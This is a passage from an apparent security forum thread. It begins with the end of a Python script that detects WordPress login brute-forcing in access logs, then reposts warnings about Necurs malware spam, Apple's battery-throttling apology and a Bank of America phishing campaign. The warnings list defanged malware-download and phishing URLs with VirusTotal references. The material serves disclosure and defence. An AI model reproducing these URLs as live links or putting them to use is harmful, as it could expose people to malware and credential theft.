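203.0.113.5 - - [20/Dec/2017:03:00:07 +0000] "POST /wp-login.php HTTP/1.1" 200 3123
198.51.100.9 - - [20/Dec/2017:03:00:09 +0000] "GET /wp-login.php HTTP/1.1" 200 3123
203.0.113.5 - - [20/Dec/2017:03:00:10 +0000] "POST /wp-login.php HTTP/1.1" 200 3123
203.0.113.5 - - [20/Dec/2017:03:00:13 +0000] "POST /wp-login.php HTTP/1.1" 200 3123
198.51.100.9 - - [20/Dec/2017:03:00:15 +0000] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.5 - - [20/Dec/2017:03:00:16 +0000] "POST /xmlrpc.php HTTP/1.1" 200 400
192.0.2.77 - - [20/Dec/2017:03:05:00 +0000] "GET / HTTP/1.1" 200 12000
"""

if __name__ == "__main__":
    print(brute_force_ips(SAMPLE_LOG))  # {'203.0.113.5': 6}
```

Two practical notes. A failed wp-login.php POST re-renders the form with status 200 while a successful one redirects with 302, so once an IP is flagged the next thing to look for is a 302 from that IP in the same burst, which is the guess that got in. And because the campaign Wordfence describes was spread across a large number of source IPs, a per-IP threshold alone will miss low-and-slow sources; the same grouping run per target username, or simply the total rate of login POSTs site-wide, is what shows the campaign as a whole.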

AplusWebMaster
2017-12-29, 12:46
FYI...

Fake 'Scan' SPAM - Necurs botnet traffic
- https://myonlinesecurity.co.uk/freaky-friday-malware-delivery-failure-necurs-botnet-sending-malformed-emails-supposed-to-deliver-globeimposter-ransomware/
29 Dec 2017 - "... Necurs botnet... several hundred I have received in the last hour have been quarantined on my mail server. The next in the never ending series of malware downloaders is an email with the subject of 'Scan' pretending to come from random names and email addresses. The name in the email body matches the alleged sender...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/2017-12-29_10-17-04.png

Scan_0041.7z: Extracts to: -6dt874p53077.js - Current Virus total detections 14/59*. Hybrid Analysis**...
This particular js has these 3 urls embedded in it (there will be dozens of other Urls that download the payload in different js files). It uses the first url & only moves to the next if the first does not respond
(VirusTotal 9/66[3])...
http ://damynghedunglinh .com/YoepHGds?
http ://3dpvietnam .com/YoepHGds?
http ://emergency-help .com.au/YoepHGds? ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/1e71e61ebcabc7b5da7e797fd28656c6684c03a632131e8341757152328370af/analysis/1514542049/
Scan_005416.js

** https://www.hybrid-analysis.com/sample/1e71e61ebcabc7b5da7e797fd28656c6684c03a632131e8341757152328370af?environmentId=100
DNS Requests
198.143.137.42
Contacted Hosts
198.143.137.42

3] https://www.virustotal.com/en/file/16c5fa60941cb337b5c5adbb808a7659e7f411da334d63c5bbe9506e81678a7d/analysis/1514542104/
YoepHGds.exe

damynghedunglinh .com: 198.143.137.42: https://www.virustotal.com/en/ip-address/198.143.137.42/information/
> https://www.virustotal.com/en/url/1d53980b609cbb6ff70ed3857c183ebe398c0d2987a3f2606d2d75d032bba43c/analysis/
___

Apple 'Batterygate'
>> https://www.cnbc.com/2017/12/28/apple-batterygate-letter-full-text.html
Dec 29, 2017
"Apple apologizes for iPhone slowdowns and offers $29 battery replacements..."
>> https://www.reuters.com/article/us-apple-batteries/apple-apologizes-after-outcry-over-slowed-iphones-idUSKBN1EM20N
Dec 28, 2017 - "... Apple Inc (AAPL.O) is slashing prices for battery replacements and will change its software to show users whether their phone battery is good..."

> https://www.apple.com/iphone-battery-and-performance/
Dec 28, 2017 - "A Message to Our Customers about iPhone Batteries and Performance...
Apple is reducing the price of an out-of-warranty iPhone battery replacement by $50 — from $79 to $29 — for anyone with an iPhone 6 or later whose battery needs to be replaced, starting in late January and available worldwide through December 2018. Details will be provided soon on apple.com.
Early in 2018, we will issue an iOS software update with new features that give users more visibility into the health of their iPhone’s battery, so they can see for themselves if its condition is affecting performance..."

:fear::fear: :mad:

AplusWebMaster
2018-01-17, 20:00
FYI...

BoA - phish
- https://myonlinesecurity.co.uk/bank-of-america-alert-phishing/
17 Jan 2017 - ".... an aggressive phishing campaign against Bank of America arriving overnight UK time. They all pretend to come from Bank of America < BankofAmerica@ customerloyalty.accounts.com > but are actually coming from various servers. I have posted details of 2 that I received. The emails are identical apart from the subject line. There will almost certainly be other similar subjects that I haven’t seen yet.
The subjects I have seen so far are:
Bank of America Alert Sign-in to Online Banking Locked
Bank of America Alert: Unlock Your Account Important Message From Bank Of America ®

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2018/01/2018-01-17_04-18-51.png

The link in the email http ://www .valaskabela .sk/new .php -redirects- you to:
http ://bankofamerica-com-update-work-new2018.hbdhshjdsjkds .co.uk/d983474dae569d3bdffe8735ae43151a/ (random ID /referral string after the co.uk/)...

hbdhshjdsjkds .co.uk: 162.241.225.135: https://www.virustotal.com/en/ip-address/162.241.225.135/information/
> https://www.virustotal.com/en/url/1ea0fc4f53e99c573ddca18387422f1713a3aaea12f67cdf556121ebffd9a003/analysis/

accounts .com: 204.14.52.151: https://www.virustotal.com/en/ip-address/204.14.52.151/information/
> https://www.virustotal.com/en/url/d7e5bb11af992b36391a0d1b0c6e6fed92aad23f0e22186052351c27fb30c1df/analysis/

Screenshot2: https://myonlinesecurity.co.uk/wp-content/uploads/2018/01/2018-01-17_04-18-01.png

All of these emails use Social engineering tricks to persuade you to open-the-attachments that come with the email..."

:fear::fear: :mad: